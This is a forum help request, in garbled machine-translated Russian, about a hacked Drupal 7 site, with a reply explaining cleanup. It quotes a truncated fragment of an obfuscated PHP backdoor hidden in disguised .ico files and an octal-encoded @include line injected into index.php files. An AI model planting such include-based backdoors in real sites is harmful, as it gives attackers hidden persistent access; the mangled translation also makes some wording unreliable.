Мой сайт на drupal 7 недавно был взломан — наверное, из-за не исправленной критической проблемы (у меня было две минорные версии, более старые, чем последняя), но я не могу сделать это снова.
Что происходит:
Время от времени (возможно, вызванный доступом к какой-либо странице) сайт попадает во внутреннюю ошибку, когда корневой URL-адрес показывает что-то вроде (извините — я забыл записать это время) «ошибка PHP, ожидаемая), но, найденная в …. там это какой-то путь к файлу .ico «
Этот ICO-файл содержит только некоторый PHP-код. и расположен в разных местах, обычно он имеет имя, например .fsdr4ef.ico и находится в случайных местах, таких как modues / file
Пример содержания:
рк / (/vz8rq/отделка/mvo0/ (/v/ Preg_replace /m6yf/ (/QP/ Rawurldecode /s8/ (/13rz/»%2F%5C%28.%2A%24%2F»/эс/) /ctyo/, », ФАЙЛ/st8j1/) /htzf3//p6i25/) /k1vd//k5/) /DH0/; $6famu = «G% 00% 17K% 12% 07% 03S% 0A% 40% 0C% 07G% 09% 15C% 11V% 02% 0Bj% 00A% 07% 17% 0AV% 12h% 00A% 06% 07A% 06 % 0ENJF% 24% 1D% 3D% 07V% 05% 0F% 5B% 06% 06N% 10% 1B% 5C% 03V% 0El% 00% 09% 5B% 17K% 11% 170M% 14R% 02G% 06F% 12O % 0EXJT% 24л% 17GY% 0E% 16D% 10% 0ETCV% 1EQ% 00X% 13% 05% 13% 5B% 00Z% 00% 0 C% 01% 0E% 14F% 04C% 06% 0DEK% 0A% 13% 0B % 1FG% 10% 1BC% 17% 0C% 0AA% 14% 40% 1D% 0C% 1EZOLG% 40% 04% 0 C% 5E% 0E% 5D% 08CR% 0EA% 10X% 13% 05% 09GK% 0A% 00 % 5E% 15F% 13% 0A% 13_FF% 17% 5C% 05% 06% 01% 06BM% 0BC% 0A% 10% 1CX% 0em% 0AD% 05OLG% 40% 04% 0 C% 5E% 0E% 5D% 08CA% 13F % 5E% 10% 40% 06% 12% 1DGA% 05% 17% 18% 40% 12X% 12G8BO% 0B% 5E% 00% 154% 0A% 0Fj% 3E% 1ACY% 15GA% 05% 17% 18% 40 % 12X% 12G8BO% 0B% 5E% 00% 154% 0A% 0Fj% 3E% 13YF% 11% 19F% 19% 0A% 19uB% 5E% 3E% 08% 1EL% 11% 1BO% 18% 05% 05M% 09U % 0E% 0EA% 14T% 14% 5B% 1B% 0FM% 0EH% 17AW% 06% 05Z% 07KKX% 1DK% 12B% 11% 5DCBM% 02_% 0F% 09% 0CA% 04ZK% 17% 10% 01_% 08C % 1A% 02F% 15% 1B% 3DGR% 14% 13% 40% 1BX% 1E% 0A% 16% 5BF% 0AC% 14FRgF% 1A_F% 5B% 7CC% 03U% 16% 06R% 02% 20% 196% 02 % 2A_C% 609% 1646p% 0AG% 28% 0-0% 60% 27uFd3Cb% 1A% 0B% 3EWVA% 3FnFd% 15С% 40% 29% 0B% 5D1J% 1AP% 12% 06% 07DH% 3FD% 19% 2AT0O% 23FFd9Cb3 % 60% 2
и это намного дольше.
Это ico include вызывается случайно сгенерированными файлами index.php, расположенными также в разных каталогах (и код также находится в основном index.php в корневой папке)
/55b79/
@include «\ 057d \ 141t \ 141 / \ 167e \ 142 / \ 166i \ 162t \ 165a \ 154s \ 0571 \ 0670 \ 0676 \ 070 / \ 166i \ 162t \ 165a \ 154 / \ 167w \ 167 / \ 155o \ 144u \ 154e \ 163 / \ 146i \ 154e \ 057. \ 1467 \ 1433 \ 143f \ 065c \ 056i \ 143o «;
/55b79/
Что я сделал до сих пор:
I changed my FTP password
Deleted everything by sites/ folde
Uploaded a lates Drupal 7 version
Searched and deleted all index.php files and suspicious .ico files
Changed Drupal admin password
Updated all modules and removed unsused ones
Казалось, что все работает нормально, но через несколько дней та же проблема — я действительно не знаю, как это может происходить? Я искал даже внутри всего файла .php, чтобы выяснить, где эти index.php могут быть созданы или около того, но ничего не нашел.
Спасибо за любую помощь.
TC
Это закодированный путь
@include "\057d\141t\141/\167e\142/\166i\162t\165a\154s\0571\0670\0676\070/\166i\162t\165a\154/\167w\167/\155o\144u\154e\163/\146i\154e\057.\1467\1433\143f\065c\056i\143o";
который декодирует (декодировать из Вот)
@include "/data/web/virtuals/170768/virtual/www/modules/file/.f7c3cf5c.ico"
Это бэкдор, замаскированный под значок файла. Удалите этот файл и удалите все вредоносные файлы index.php. Также могут быть некоторые файлы со случайными именами, такими как rkhqjezh.php
, Удалить их тоже. Также загляните в ваши существующие файлы php. Некоторый вредоносный код также может быть внедрен в начало этих файлов. Убери это. Это утомительный процесс, но в конечном итоге вы сможете удалить каждый из этих файлов. Как только вы закончите с этим, вы можете изменить свои пароли FTP. Также посмотрите на свои журналы mysql, чтобы видеть, есть ли возможная инъекция sql.
Других решений пока нет …